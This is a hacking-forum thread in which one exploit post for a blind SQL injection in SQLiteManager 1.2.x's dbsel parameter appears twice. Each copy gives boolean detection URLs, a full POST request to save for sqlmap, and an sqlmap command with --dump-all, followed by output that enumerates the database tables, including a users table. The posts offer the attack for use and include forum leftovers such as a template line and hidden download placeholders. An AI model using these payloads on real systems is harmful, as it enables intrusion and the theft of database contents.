SQLi/Dork SQLiteManager 1.2.0 / 1.2.4 - Blind SQL Injection Vulnerability

[0dayhacker]

Risk: [Security Risk High] 0day-ID-33164 Category: web applications Platform: php
1. Description

SQLiteManager 1.20 allows SQL injection via the /sqlitemanager/main.php
dbsel parameter. NOTE: This product is discontinued.
---------------------------------------------------------------------------------
2. Proof of Concept

Detect:

http://localhost/sqlitemanager/main.php?dbsel=-1%20or%2072%20=%2072

http://localhost/sqlitemanager/main.php?dbsel=-1%20or%2072%20=%2070

----------------------------------------------------------------------------------
Save the next post in a file: sqli.txt

POST /sqlite/main.php?dbsel=-1%20or%2032%20%3d%2030 HTTP/1.1

Content-Length: 191

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Cookie: PHPSESSID=s5uogfet0s4nhr81ihgmg5l4v3;

SQLiteManager_currentTheme=default; SQLiteManager_currentLangue=8;

SQLiteManager_fullText=0; SQLiteManager_HTMLon=0

Host: localhost

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;

Trident/5.0)

 

action=save&ColumnList=1&ConditionList=1&trigger=&TriggerAction=FOR%20EACH%20ROW&TriggerCondition=WHEN&TriggerEvent=DELETE&TriggerMoment=BEFORE&TriggerName=kqluvanc&TriggerOn=t1&TriggerStep=1

$ python sqlmap.py -r sqli.txt -p dbsel --level 5 --risk 3 --dump-all

#boom

[11:58:27] [INFO] resuming back-end DBMS 'sqlite'
[11:58:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: dbsel (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: dbsel=-4019 OR 7689=7689
---
[11:58:27] [INFO] the back-end DBMS is SQLite
web server operating system: Windows
web application technology: PHP X.X.X, Apache 2.X.X
back-end DBMS: SQLite
[11:58:27] [INFO] sqlmap will dump entries of all tables from all databases
now
[11:58:27] [INFO] fetching tables for database: 'SQLite_masterdb'
[11:58:27] [INFO] fetching number of tables for database 'SQLite_masterdb'
[11:58:27] [WARNING] reflective value(s) found and filtering out
[11:58:27] [WARNING] running in a single-thread mode. Please consider usage
of o
ption '--threads' for faster data retrieval
[11:58:27] [INFO] retrieved: 5
[11:58:27] [INFO] retrieved: database
[11:58:28] [INFO] retrieved: user_function
[11:58:30] [INFO] retrieved: attachment
[11:58:31] [INFO] retrieved: groupes
[11:58:32] [INFO] retrieved: users

like this post and Reply pls thanks for you

--------------------------------------------------------------------------------------------------------------------------------------------
ADD AN IMAGE HERE! [Not adding an image will result in removal]
Then remove these lines.

Download:

To view the content, you need to Sign In or Register.

Click to read more...

 

[yumiao001]

Risk: [Security Risk High] 0day-ID-33164 Category: web applications Platform: php
1. Description

SQLiteManager 1.20 allows SQL injection via the /sqlitemanager/main.php
dbsel parameter. NOTE: This product is discontinued.
---------------------------------------------------------------------------------
2. Proof of Concept

Detect:

http://localhost/sqlitemanager/main.php?dbsel=-1%20or%2072%20=%2072

http://localhost/sqlitemanager/main.php?dbsel=-1%20or%2072%20=%2070

----------------------------------------------------------------------------------
Save the next post in a file: sqli.txt

POST /sqlite/main.php?dbsel=-1%20or%2032%20%3d%2030 HTTP/1.1

Content-Length: 191

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Cookie: PHPSESSID=s5uogfet0s4nhr81ihgmg5l4v3;

SQLiteManager_currentTheme=default; SQLiteManager_currentLangue=8;

SQLiteManager_fullText=0; SQLiteManager_HTMLon=0

Host: localhost

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;

Trident/5.0)

 

action=save&ColumnList=1&ConditionList=1&trigger=&TriggerAction=FOR%20EACH%20ROW&TriggerCondition=WHEN&TriggerEvent=DELETE&TriggerMoment=BEFORE&TriggerName=kqluvanc&TriggerOn=t1&TriggerStep=1

$ python sqlmap.py -r sqli.txt -p dbsel --level 5 --risk 3 --dump-all

#boom

[11:58:27] [INFO] resuming back-end DBMS 'sqlite'
[11:58:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: dbsel (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: dbsel=-4019 OR 7689=7689
---
[11:58:27] [INFO] the back-end DBMS is SQLite
web server operating system: Windows
web application technology: PHP X.X.X, Apache 2.X.X
back-end DBMS: SQLite
[11:58:27] [INFO] sqlmap will dump entries of all tables from all databases
now
[11:58:27] [INFO] fetching tables for database: 'SQLite_masterdb'
[11:58:27] [INFO] fetching number of tables for database 'SQLite_masterdb'
[11:58:27] [WARNING] reflective value(s) found and filtering out
[11:58:27] [WARNING] running in a single-thread mode. Please consider usage
of o
ption '--threads' for faster data retrieval
[11:58:27] [INFO] retrieved: 5
[11:58:27] [INFO] retrieved: database
[11:58:28] [INFO] retrieved: user_function
[11:58:30] [INFO] retrieved: attachment
[11:58:31] [INFO] retrieved: groupes
[11:58:32] [INFO] retrieved: users

like this post and Reply pls thanks for you

--------------------------------------------------------------------------------------------------------------------------------------------
ADD AN IMAGE HERE! [Not adding an image will result in removal]
Then remove these lines.

Download:



*** Hidden text: cannot be quoted. ***
​

View attachment 102161

thanks